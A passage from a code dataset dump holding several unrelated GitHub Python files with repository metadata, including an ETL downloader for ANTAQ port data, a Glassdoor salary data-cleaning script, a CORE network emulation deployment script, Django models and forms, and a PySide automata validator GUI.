GPT2SberSimple\nfrom definitions import SBER_MODEL_SMALL, SpecialTokens\nfrom transformers import logging\nfrom typing import Tuple\n\n\ndef generate(\n model_dir: str,\n tokenizer_path: str,\n context: str,\n max_len: int,\n beam_size: int,\n top_k: int,\n top_p: float,\n is_answer: bool,\n sampling: bool,\n device: torch.device = torch.device(\"cpu\"),\n) -> Tuple[str, float]:\n if not is_answer:\n model = GPT2SberSimple(model_dir, tokenizer_path, device)\n else:\n model = GPT2SberContext(model_dir, tokenizer_path, device)\n model.eval()\n\n start = time.time()\n generated_text = model.generate(\n context=context, max_length=max_len, beam_size=beam_size, sampling=sampling, top_k=top_k, top_p=top_p\n )\n elapsed_time = time.time() - start\n\n return generated_text, elapsed_time\n\n\nif __name__ == \"__main__\":\n logging.set_verbosity(0)\n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n args = ArgumentParser()\n args.add_argument(\"--model_dir\", required=False, type=str, default=SBER_MODEL_SMALL, help=\"Directory with hf model\")\n args.add_argument(\n \"--tokenizer_path\", required=False, type=str, default=SBER_MODEL_SMALL, help=\"Directory with tokenizer\"\n )\n args.add_argument(\"--context\", type=str, required=True, help=\"Context for generation\")\n args.add_argument(\"--max_len\", type=int, required=False, default=100, help=\"Max length of the output in tokens\")\n args.add_argument(\"--beam_size\", type=int, required=False, default=5, help=\"Beam width\")\n args.add_argument(\"--gpu\", action=\"store_true\", help=\"Whether to use GPU or not\")\n args.add_argument(\"--ans\", action=\"store_true\", help=\"Model type -- with answers or not\")\n args.add_argument(\"--sampling\", action=\"store_true\", help=\"Generation type\")\n args.add_argument(\"--top_k\", type=int, default=50)\n args.add_argument(\"--top_p\", type=float, default=0.9)\n args = args.parse_args()\n\n device = torch.device(\"cuda\") if args.gpu else torch.device(\"cpu\")\n\n generated_text, elapsed_time = generate(\n model_dir=args.model_dir,\n tokenizer_path=args.tokenizer_path,\n context=args.context,\n max_len=args.max_len,\n beam_size=args.beam_size,\n is_answer=args.ans,\n sampling=args.sampling,\n device=device,\n top_k=args.top_k,\n top_p=args.top_p\n )\n print(generated_text)\n print(f\"Elapsed time: {elapsed_time: .3f} seconds\")\n","repo_name":"Stasiche/CHGK","sub_path":"src/generation/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"27750884242","text":"f = open('all2.txt','r')\nres = open('all3.txt','w')\nhow = 1\npharmacy = []\nhowcomms = 0\nfor i in f:\n if how%2==0:\n if i.strip() not in pharmacy:\n url = i.strip()\n res.write(f'\\n{url}')\n else:\n try:\n comms = i.strip().replace(',','\\n')\n res.write(f'{comms}')\n except:\n name = i.strip()\n res.write(f'{name}')\n how+=1\nf.close()\nres.close()","repo_name":"NemoKam/djangoRomePharmacy","sub_path":"parser/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10992872717","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass Account(AbstractUser):\n username = models.CharField(max_length=50,\n unique=True)\n followed_genres = models.ManyToManyField('movies.Genre',\n related_name='users_following',\n blank=True)\n followed_artists = models.ManyToManyField('movies.Artist',\n related_name='users_following',\n blank=True)\n\n def __str__(self):\n return self.username\n","repo_name":"aightmunam/MovieDB","sub_path":"moviedb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72418850827","text":"import wget\r\nimport os\r\nimport shutil\r\nimport zipfile\r\n\r\n\r\n\r\n# Bloco Definição de Variaveis\r\netl_projeto_name = 'ANTAQ'\r\nzones = ['bronze', 'prata', 'ouro']\r\nano = ['2019', '2020', '2021']\r\nfile_remove = ['AcordosBilaterais', 'Carga_Conteinerizada', 'Carga_Regiao', 'TemposAtracacao']\r\nurl='http://web.antaq.gov.br/Sistemas/ArquivosAnuario/Arquivos/{}.zip'\r\nurl_meta_dados = 'http://web.antaq.gov.br/Sistemas/ArquivosAnuario/Arquivos/MetadadosMovimentacao.zip'\r\npath_parent = os.path.dirname(os.getcwd())\r\n\r\n\r\nos.chdir(path_parent)\r\nos.chdir(zones[0])\r\n\r\n\r\n# Bloco Extração: Esta parte do codigo vai verificar se o item já existe, caso o item já exista ele ira remover o antigo e atualizar para um novo\r\nif os.path.exists('MetadadosMovimentacao.zip'):\r\n print(f'O arquivo MetadadosMovimentacao.zip será substituido por um novo')\r\n os.remove('MetadadosMovimentacao.zip')\r\n wget.download(url_meta_dados)\r\nelse:\r\n print('Download: MetadadosMovimentacao.zip')\r\n wget.download(url_meta_dados)\r\n print('')\r\n\r\nfor a in range(len(ano)):\r\n if os.path.exists(f'{ano[a]}.zip'):\r\n print(f'O arquivo {ano[a]}.zip será substituido por um novo')\r\n os.remove(f'{ano[a]}.zip')\r\n wget.download(url.format(ano[a]))\r\n print('')\r\n else:\r\n print(f'Downloado: {ano[a]}.zip')\r\n wget.download(url.format(ano[a]))\r\n print('')\r\n\r\n\r\n# Bloco Copy Zona Prata: Esta parte do codigo vai pegar os itens da camada bronze e copiar para zona prata, onde será feita todas as transformações necessarias\r\nsrc = os.getcwd()\r\nos.chdir(path_parent)\r\nos.chdir(zones[1])\r\ndst = os.getcwd()\r\n\r\nfor a in range(len(ano)):\r\n src_data = (src+'\\\\{}.zip '.format(ano[a]))\r\n dst_data = (dst+'\\\\{}.zip '.format(ano[a]))\r\n print('Copiando {}.zip para camada prata'.format(ano[a]))\r\n shutil.copyfile(src_data,dst_data)\r\n print('')\r\n\r\nsrc_md = (src+'\\\\MetadadosMovimentacao.zip')\r\ndst_md = (dst+'\\\\MetadadosMovimentacao.zip')\r\nprint('Copiando MetadadosMovimentacao.zip para camada prata')\r\nshutil.copyfile(src_md, dst_md) \r\n\r\n# Bloco Unzip arquivos: Esta parte do codigo vai pegar os arquivos da zona prata e unzinpar.\r\nprint('Unzip dos arquivos da camada prata:')\r\nwith zipfile.ZipFile(\"MetadadosMovimentacao.zip\",\"r\") as zip_ref:\r\n zip_ref.extractall(\"MetadadosMovimentacao\")\r\n\r\nfor a in range(len(ano)):\r\n with zipfile.ZipFile(\"{}.zip\".format(ano[a]), 'r') as zip_ref:\r\n zip_ref.extractall(ano[a])\r\n\r\n\r\n\r\n# Camada de Delete arquivos extras: Esta parte do codigo vamos deletar os arquivos que não serão usados pela equipe de DS\r\nsavePath = os.getcwd()\r\nprint('Removendo MetadadosMovimentacao.zip')\r\nos.remove(\"MetadadosMovimentacao.zip\")\r\nfor a in range(len(ano)):\r\n os.chdir(ano[a])\r\n for f in range(len(file_remove)):\r\n print(\"Removendo arquivos: {}{}.txt\".format(ano[a], file_remove[f]))\r\n os.remove(\"{}{}.txt\".format(ano[a], file_remove[f]))\r\n os.chdir(savePath)\r\n print(\"Removendo: {}.zip\".format(ano[a]))\r\n os.remove(\"{}.zip\".format(ano[a]))\r\n\r\n","repo_name":"jamcabral/sfiec_jam","sub_path":"__main__/00extracaofull.py","file_name":"00extracaofull.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38062948044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 13:54:02 2020\n\n@author: ravit\n\"\"\"\n\n\nimport pandas as pd\nimport os \n\n\ndf = pd.read_csv(\"glassdoor_jobs.csv\")\n\n# Salary parsing\n\ndf[\"hourly\"] = df[\"Salary Estimate\"].apply(lambda x: 1 if 'per hour' in x.lower() else 0)\ndf[\"employer_provided\"]= df[\"Salary Estimate\"].apply(lambda x: 1 if 'employer provided' in x.lower() else 0)\n\ndf = df[df[\"Salary Estimate\"] != '-1']\n\nsalary = df[\"Salary Estimate\"].apply(lambda x: x.split('(')[0])\nmin_hr_eps = salary.apply(lambda x: x.lower().replace('per hour', '').replace('employer provided salary:',''))\nmin_kd = min_hr_eps.apply(lambda x: x.lower().replace('$','').replace('k',''))\n\ndf[\"min_salary\"] = min_kd.apply(lambda x: int(x.split('-')[0]))\ndf[\"max_salary\"] = min_kd.apply(lambda x: int(x.split('-')[1]))\ndf[\"avg_salary\"] = (df.min_salary + df.max_salary)/2\n\n# Company name text only\n\ndf[\"company_name_txt\"] = df.apply(lambda x: x[\"Company Name\"] if x[\"Rating\"] < 0 else x[\"Company Name\"][:-3], axis=1)\n\n# State field\ndf[\"job_state\"] = df[\"Location\"].apply(lambda x: x.split(', ')[1])\ndf.job_state.value_counts()\n#Modifying Los Angeles value to CA\ndf[\"job_state\"] = df[\"job_state\"].apply(lambda x: x if x != 'Los Angeles' else 'CA')\n\ndf[\"hq_same_state\"] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis=1)\n\n# age of company\ndf[\"age_of_company\"] = df[\"Founded\"].apply(lambda x: x if x<0 else 2020-x)\n\n# parsing of job description(python, etc..,)\ndf[\"python_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'python' in x.lower() else 0)\ndf.python_yn.value_counts()\n\ndf[\"r_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'r studio' in x.lower() or 'r-studio' in x.lower() else 0)\ndf.r_yn.value_counts()\n\ndf[\"spark_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'spark' in x.lower() else 0)\ndf.spark_yn.value_counts()\n\ndf[\"aws_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'aws' in x.lower() else 0)\ndf.aws_yn.value_counts()\n\ndf[\"excel_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'excel' in x.lower() else 0)\ndf.excel_yn.value_counts()\n\n#drop Unnamed(first) column\ndf.columns\ndf.drop(\"Unnamed: 0\", axis=1, inplace = True)\n\n\n#change job title to the higher hierarchy\ndef title_simplifier(title):\n if 'data scientist' in title.lower():\n return 'data scientist'\n elif 'data engineer' in title.lower():\n return 'data engineer'\n elif 'data analyst' in title.lower():\n return 'analyst'\n elif 'machine learning' in title.lower():\n return 'machine learning engineer'\n elif 'manager' in title.lower():\n return 'manager'\n elif 'director' in title.lower():\n return 'director'\n else:\n return 'na'\n \ndf[\"job_simp\"] = df['Job Title'].apply(title_simplifier)\ndf.job_simp.value_counts()\n\n#seniority data transformation\ndef seniority(title):\n if 'sr' in title.lower() or 'senior' in title.lower() or 'sr.' in title.lower() or 'lead' in title.lower() or 'principal' in title.lower():\n return 'senior'\n elif 'jr' in title.lower() or 'jr.' in title.lower():\n return 'junior'\n else:\n return 'na'\n \ndf[\"seniority\"] = df['Job Title'].apply(seniority)\ndf.seniority.value_counts()\n\n#length of job description\ndf[\"job_desc_len\"] = df[\"Job Description\"].apply(lambda x: len(x))\n \n#count of competitors\ndf[\"comp_count\"] = df[\"Competitors\"].apply(lambda x: 0 if x == '-1' else len(x.split(',')))\n\n#converting hourly wage to annual\ndf[\"min_salary\"]= df.apply(lambda x: (x.min_salary*1816)//1000 if x.hourly==1 else x.min_salary, axis =1) \ndf[\"max_salary\"]= df.apply(lambda x: (x.max_salary*1816)//1000 if x.hourly==1 else x.max_salary, axis =1) \n#df[df[\"min_salary\"]>df[\"max_salary\"]][[\"hourly\", \"min_salary\", \"max_salary\"]]\n#df[df[\"hourly\"]==1][[\"hourly\", \"min_salary\", \"max_salary\"]]\n#df.drop(\"max_salary_temp\", axis=1, inplace =True)\n\n#removing \\n from the company_txt column\n#df[df[\"company_name_txt\"].head()\ndf[\"company_name_txt\"] = df[\"company_name_txt\"].apply(lambda x: x.replace('\\n',''))\n\nfilename = 'glassdoor_jobs_data_cleaned.csv'\n\nif os.path.exists(filename):\n os.remove(filename)\ndf.to_csv(filename, index= False)\n ","repo_name":"krteja44/glassdoor_salary_prediction","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70134373387","text":"# Third party APIs \nimport logging\nimport json\nimport sys \nimport mailslurp_client\nimport os\n\nfrom mailslurp_client.rest import ApiException\n\n# Logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\ndef get_email_content_from_mailslurp(email_id, configuration):\n with mailslurp_client.ApiClient(configuration) as api_client:\n api_instance = mailslurp_client.EmailControllerApi(api_client)\n decode = False\n api_response = None\n try:\n api_response = api_instance.get_email_html(email_id, decode=decode)\n return api_response\n except ApiException as e:\n logging.error(\"Exception when calling EmailControllerApi->get_email_html: %s\\n\" % e)\n raise ValueError(\"Unable to retrieve email content with emailId = \" + email_id)\n\ndef write_to_airtable(airtable, records):\n for record in records:\n try:\n airtable.insert(record)\n except:\n logging.error(\"Unable to write record - \" + json.dumps(record))\n\n","repo_name":"arjunrao87/PRR","sub_path":"prr/haro/utils/tpa.py","file_name":"tpa.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"82"} +{"seq_id":"32682517565","text":"# required imports\nimport os\nimport numpy as np\nfrom network import Network\nfrom time import sleep\nfrom core.api.grpc import client\nfrom core.api.grpc.core_pb2 import Node, NodeType, Position, SessionState, LinkOptions, Interface\n\nraft_files = [\"tcp_logger.py\", \"crypto.py\", \"tcp_client.py\", \"network_info.csv\", \"tcp_server.py\", \"start_client_service.sh\"]\nraft_files.extend([\"start_sotaru_service.sh\", \"node.py\", \"file_logger.py\", \"logger_server_info.csv\", \"client.py\"])\nraft_files.extend([\"network.py\", \"raft.py\", \"tcp_logger_server_info.py\", \"helper.py\", \"http_server.py\", \"logger.py\"])\n\nservice_name = \"UserDefined\"\n\nstartup_node_service_cmd = \"bash start_sotaru_service.sh\"\nstartup_client_service_cmd = \"bash start_client_service.sh\"\n\ndef get_file_content(relative_path):\n dirname = os.path.dirname(__file__)\n filename = os.path.join(dirname, relative_path)\n \n f = open(filename)\n content = f.read()\n \n f.close()\n return str(content)\n\ndef configure_services(session_id, nodes, startup_cmd):\n \n for node in nodes:\n core.set_node_service(\n session_id,\n node,\n service_name,\n files = raft_files,\n directories=[],\n startup=[startup_cmd],\n validate=[],\n shutdown=[],\n )\n\n for file in raft_files:\n core.set_node_service_file(\n session_id,\n node,\n service_name,\n file,\n get_file_content(file),\n )\n\ndef shutdown_session(session_id):\n print('ending core session ' + str(session_id))\n core.stop_session(session_id)\n core.delete_session(session_id)\n\nnetwork = Network('network_info.csv')\n\n# create grpc client and connect\ncore = client.CoreGrpcClient()\ncore.connect()\n\n# kill older sessions\nresponse = core.get_sessions()\nfor session in response.sessions:\n shutdown_session(session.id)\n\n# create session and get id\nresponse = core.create_session()\nsession_id = response.session_id\n\n# change session state to configuration so that nodes get started when added\ncore.set_session_state(session_id, SessionState.CONFIGURATION)\n\n# create network\nradius = 150\ncenter = Position(x=500, y=350)\nnode_ids = []\nclient_ids = []\nfor router in network.routers:\n router_position = center\n core_router = Node(type=NodeType.DEFAULT, position=router_position, model=\"router\", name=router.name)\n response = core.add_node(session_id, core_router)\n router.set_id(response.node_id)\n\n switchs_qty = len(router.switchs)\n if switchs_qty:\n switch_rot_degree_steps = 360/switchs_qty\n for s_id, switch in enumerate(router.switchs):\n switch_rot_degree = s_id*switch_rot_degree_steps\n x = radius * np.cos(np.deg2rad(switch_rot_degree)) + center.x\n y = radius * np.sin(np.deg2rad(switch_rot_degree)) + center.y\n \n switch_position = Position(x=x, y=y)\n core_switch = Node(type=NodeType.SWITCH, position=switch_position, name=switch.name)\n response = core.add_node(session_id, core_switch)\n switch.set_id(response.node_id)\n\n nodes_qty = len(switch.nodes)\n if nodes_qty:\n node_rot_degree_steps = 90/nodes_qty\n for n_id, node in enumerate(switch.nodes):\n node_rot_degree = (n_id*node_rot_degree_steps) + switch_rot_degree - 45\n x = radius * np.cos(np.deg2rad(node_rot_degree)) + switch_position.x\n y = radius * np.sin(np.deg2rad(node_rot_degree)) + switch_position.y\n \n node_position = Position(x=x, y=y)\n core_node = Node(type=NodeType.DEFAULT, position=node_position, model=\"host\", name=node.name, services=[\"DefaultRoute\", \"SSH\", \"UserDefined\"])\n response = core.add_node(session_id, core_node)\n node.set_id(response.node_id)\n node_ids.append(response.node_id)\n \n clients_qty = len(node.clients)\n if clients_qty:\n client_rot_degree_steps = 90/clients_qty\n for c_id, client in enumerate(node.clients):\n client_rot_degree = (c_id*client_rot_degree_steps) + node_rot_degree\n x = radius/2 * np.cos(np.deg2rad(client_rot_degree)) + node_position.x\n y = radius/2 * np.sin(np.deg2rad(client_rot_degree)) + node_position.y\n \n client_position = Position(x=x, y=y)\n core_client = Node(type=NodeType.DEFAULT, position=client_position, model=\"PC\", name=client.name, services=[\"DefaultRoute\", \"SSH\", \"UserDefined\"])\n response = core.add_node(session_id, core_client)\n client_ids.append(response.node_id)\n client.set_id(response.node_id)\n \nconfigure_services(session_id, node_ids, startup_node_service_cmd)\nconfigure_services(session_id, client_ids, startup_client_service_cmd)\n\nlink_configs = []\n\n# link configs\nfor i in range(4):\n link_config = LinkOptions(bandwidth=0, delay=int(i*100e3), dup=0, loss=0, jitter=0,)\n link_configs.append(link_config)\n\n# link switches to routers\nfor router in network.routers:\n for router_idx, switch in enumerate(router.switchs):\n iface_data = Interface(id=router_idx, ip4=switch.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, router.id, switch.id, iface_data, options=link_configs[router_idx])\n core.add_link(session_id, router.id, switch.id, iface_data)\n\n # link nodes to switches\n for node_idx,node in enumerate(switch.nodes):\n option = LinkOptions(bandwidth=0, delay=int(node_idx*10e3), dup=0, loss=0, jitter=0,)\n iface_data = Interface(id=node_idx, ip4=node.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, node.id, switch.id, iface_data, options=option)\n core.add_link(session_id, node.id, switch.id, iface_data)\n\n for client_idx,client in enumerate(node.clients):\n option = LinkOptions(bandwidth=0, delay=int(client_idx*10e3), dup=0, loss=0, jitter=0,)\n iface_data = Interface(ip4=client.host, ip4_mask=24, ip6=\"2001::\", ip6_mask=64,)\n # core.add_link(session_id, node.id, switch.id, iface_data, options=option)\n core.add_link(session_id, client.id, switch.id, iface_data)\n\n# change session state\ncore.set_session_state(session_id, SessionState.INSTANTIATION)\n\nwhile(True):\n cmd = input('Enter \"end\" to kill core_session: ')\n if cmd == \"end\":\n shutdown_session(session_id)\n break","repo_name":"CleberPeter/SOTARU","sub_path":"deploy_network.py","file_name":"deploy_network.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"26797704267","text":"from django import forms\nfrom django.core import validators\nfrom .models import Trip\n\n\nclass TripForm(forms.ModelForm):\n\n class Meta:\n model = Trip\n exclude = [\"author\"]\n\n widgets = {\n 'year_visited': forms.NumberInput(attrs={\n 'placeholder': 'The year you visited'\n }),\n 'note': forms.Textarea(attrs={\n 'placeholder': 'Some things you remember...'\n }),\n 'trip_img': forms.ClearableFileInput()\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['country_visited'].label = 'Country Visited'\n self.fields['year_visited'].label = 'Year'\n self.fields['note'].label = 'Note'\n self.fields['trip_img'].label = 'Photo'\n","repo_name":"OliverOC/my-travel-mapper","sub_path":"ollies_travel_hub/scratch_map/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25982580465","text":"\"\"\"Added Tables\n\nRevision ID: df7400c36888\nRevises: 05007d2d1afb\nCreate Date: 2021-10-29 07:24:28.131066\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'df7400c36888'\ndown_revision = '05007d2d1afb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('gender',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('actor',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('dob', sa.DateTime(), nullable=False),\n sa.Column('gender_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['gender_id'], ['gender.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('casting',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('actor_id', sa.Integer(), nullable=False),\n sa.Column('movie_id', sa.Integer(), nullable=False),\n sa.Column('casting_date', sa.DateTime(), nullable=False),\n sa.Column('recast_yn', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['actor_id'], ['actor.id'], ),\n sa.ForeignKeyConstraint(['movie_id'], ['movie.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('actor_id', 'movie_id',\n 'casting_date',\n name='UX_actor_movie_date')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('casting')\n op.drop_table('actor')\n op.drop_table('gender')\n # ### end Alembic commands ###\n","repo_name":"GiftXXVI/FSND_Capstone","sub_path":"migrations/versions/df7400c36888_added_tables.py","file_name":"df7400c36888_added_tables.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21806688942","text":"#!/usr/bin/python3.4\n# sorted 应用 \nfrom operator import itemgetter\n\nL = ['bob','about','Zoo','Credit']\n\nprint(sorted(L))\nprint(sorted(L,key = str.lower))\n\ns = [('Bob',75),('Adam',92),('Bart',68),('Lisa',88)]\ndef by_name(t):\n\tprint(t[0]) #取前面的名\n\treturn t[0]\n\ns2 = sorted(s,key = by_name)\nprint(s2)\n\ndef by_score(t):\n\tprint(t[-1]) #取后面的分数\n\treturn t[-1]\n\t\ns3 = sorted(s,key = by_score,reverse = True)\nprint(s3)\n#print(sorted(s,key = itermgetter(0)))\n#print(sorted(s,key = lambda t: t[1]))\n#print(sorted(s,key = itemgetter(1),reverse = True))","repo_name":"kobeding/python","sub_path":"2015/do_sorted.py","file_name":"do_sorted.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19794598616","text":"# -- General configuration ------------------------------------------------\n\nimport os\n\nimport riemann_client\n\nif not os.environ.get('READTHEDOCS', None):\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nmaster_doc = 'index'\nexclude_patterns = ['_build']\n\n# General information about the project.\nproject = u'riemann-client'\ncopyright = u'2014, ' + riemann_client.__author__\nversion = release = riemann_client.__version__\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.coverage',\n 'sphinx.ext.viewcode'\n]\nautodoc_member_order = 'bysource'\nautoclass_content = 'both'\n","repo_name":"borntyping/python-riemann-client","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"82"} +{"seq_id":"14400882219","text":"from automataValidator import AutomataValidator\nfrom automata import Automata\nfrom PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale,\n QMetaObject, QObject, QPoint, QRect,\n QSize, QTime, QUrl, Qt)\nfrom PySide6.QtGui import (QAction, QBrush, QColor, QConicalGradient,\n QCursor, QFont, QFontDatabase, QGradient,\n QIcon, QImage, QKeySequence, QLinearGradient,\n QPainter, QPalette, QPixmap, QRadialGradient,\n QTransform,QPen)\nfrom PySide6.QtWidgets import (QApplication, QComboBox, QLabel, QMainWindow,\n QMenu, QMenuBar, QPushButton, QSizePolicy,\n QSlider, QSpinBox, QStatusBar, QLineEdit,\n QWidget)\nfrom customwidget import CustomWidget\nfrom PySide6.QtAxContainer import QAxWidget\nimport sys\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def setupUi(self, MainWindow):\n if not MainWindow.objectName():\n MainWindow.setObjectName(u\"MainWindow\")\n MainWindow.resize(900, 550)\n self.actionEspa_ol = QAction(MainWindow)\n self.actionEspa_ol.setObjectName(u\"actionEspa_ol\")\n self.actionIngles = QAction(MainWindow)\n self.actionIngles.setObjectName(u\"actionIngles\")\n self.actionAdicionar_Idioma = QAction(MainWindow)\n self.actionAdicionar_Idioma.setObjectName(u\"actionAdicionar_Idioma\")\n self.centralwidget = QWidget(MainWindow)\n self.centralwidget.setObjectName(u\"centralwidget\")\n self.label = QLabel(self.centralwidget)\n self.label.setObjectName(u\"label\")\n self.label.setGeometry(QRect(20, 10, 71, 21))\n self.spinBox = QSpinBox(self.centralwidget)\n self.spinBox.setObjectName(u\"spinBox\")\n self.spinBox.setGeometry(QRect(20, 70, 131, 22))\n self.spinBox.setMinimum(1)\n self.spinBox.setMaximum(3)\n self.horizontalSlider = QSlider(self.centralwidget)\n self.horizontalSlider.setObjectName(u\"horizontalSlider\")\n self.horizontalSlider.setGeometry(QRect(20, 110, 131, 16))\n self.horizontalSlider.setMinimum(1)\n self.horizontalSlider.setMaximum(3)\n self.horizontalSlider.setOrientation(Qt.Horizontal)\n self.validatePushButton = QPushButton(self.centralwidget)\n self.validatePushButton.setObjectName(u\"pushButton\")\n self.validatePushButton.setGeometry(QRect(20, 140, 131, 24))\n self.label_2 = QLabel(self.centralwidget)\n self.label_2.setObjectName(u\"label_2\")\n self.label_2.setGeometry(QRect(20, 180, 131, 21))\t\n self.widget = CustomWidget(self.centralwidget)\t\n self.widget.setObjectName(u\"widget\")\t\n self.widget.setGeometry(QRect(190, 60, 701, 561))\t\n self.widget.setAutoFillBackground(True)\n self.textEdit = QLineEdit(self.centralwidget)\n self.textEdit.setObjectName(u\"textEdit\")\n self.textEdit.setGeometry(QRect(100, 10, 651, 21))\n self.label_3 = QLabel(self.centralwidget)\n self.label_3.setObjectName(u\"label_3\")\n self.label_3.setGeometry(QRect(20, 50, 131, 16))\n self.comboBox = QComboBox(self.centralwidget)\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.setObjectName(u\"comboBox\")\n self.comboBox.setGeometry(QRect(767, 10, 111, 22))\n self.comboBox.setEditable(True)\n MainWindow.setCentralWidget(self.widget)\n self.menubar = QMenuBar(MainWindow)\n self.menubar.setObjectName(u\"menubar\")\n self.menubar.setGeometry(QRect(0, 0, 900, 22))\n self.menuIdioma = QMenu(self.menubar)\n self.menuIdioma.setObjectName(u\"menuIdioma\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QStatusBar(MainWindow)\n self.statusbar.setObjectName(u\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.menubar.addAction(self.menuIdioma.menuAction())\n self.menuIdioma.addAction(self.actionEspa_ol)\n self.menuIdioma.addAction(self.actionIngles)\n self.menuIdioma.addAction(self.actionAdicionar_Idioma)\n\n self.retranslateUi(MainWindow)\n\n QMetaObject.connectSlotsByName(MainWindow)\n self.addValidateButtonListener()\n # setupUi\n\n # def paintEvent(self,event):\n # painter = QPainter(self)\n # painter.setPen(QPen(Qt.green, 8, Qt.SolidLine))\n # painter.setBrush(QBrush(Qt.red, Qt.SolidPattern))\n # painter.drawEllipse(200, 200, 70, 70)\n\n def addValidateButtonListener(self):\n self.validatePushButton.clicked.connect(self.validateAutomata)\n\n def validateAutomata(self):\n input = self.textEdit.text()\n self.automataValidator = AutomataValidator(Automata(),list(input))\n if self.automataValidator.isInputStringValidate():\n self.label_2.setText(f'\\nEl caracter \"{input}\" SI es Aceptado')\n else:\n self.label_2.setText(f'\\nEl caracter \"{input}\" NO es Aceptado')\n\n def retranslateUi(self, MainWindow):\n MainWindow.setWindowTitle(QCoreApplication.translate(\"MainWindow\", u\"MainWindow\", None))\n self.actionEspa_ol.setText(QCoreApplication.translate(\"MainWindow\", u\"Espa\\u00f1ol\", None))\n self.actionIngles.setText(QCoreApplication.translate(\"MainWindow\", u\"Ingles\", None))\n self.actionAdicionar_Idioma.setText(QCoreApplication.translate(\"MainWindow\", u\"Adicionar Idioma\", None))\n self.label.setText(QCoreApplication.translate(\"MainWindow\", u\"

Palabra:

\", None))\n self.spinBox.setPrefix(\"\")\n self.validatePushButton.setText(QCoreApplication.translate(\"MainWindow\", u\"Validar\", None))\n self.label_2.setText(QCoreApplication.translate(\"MainWindow\", u\"Estas onfire\", None))\n self.label_3.setText(QCoreApplication.translate(\"MainWindow\", u\"Velocidad de ejecuci\\u00f3n:\", None))\n self.comboBox.setItemText(0, QCoreApplication.translate(\"MainWindow\", u\"Espa\\u00f1ol\", None))\n self.comboBox.setItemText(1, QCoreApplication.translate(\"MainWindow\", u\"Ingles\", None))\n\n self.menuIdioma.setTitle(QCoreApplication.translate(\"MainWindow\", u\"Idioma\", None))\n # retranslateUi\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())","repo_name":"diego-Ballesteros/Automata","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} 